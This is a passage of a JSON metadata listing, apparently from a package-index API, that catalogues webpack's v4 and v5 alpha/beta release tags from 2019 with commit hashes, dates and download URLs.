ta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha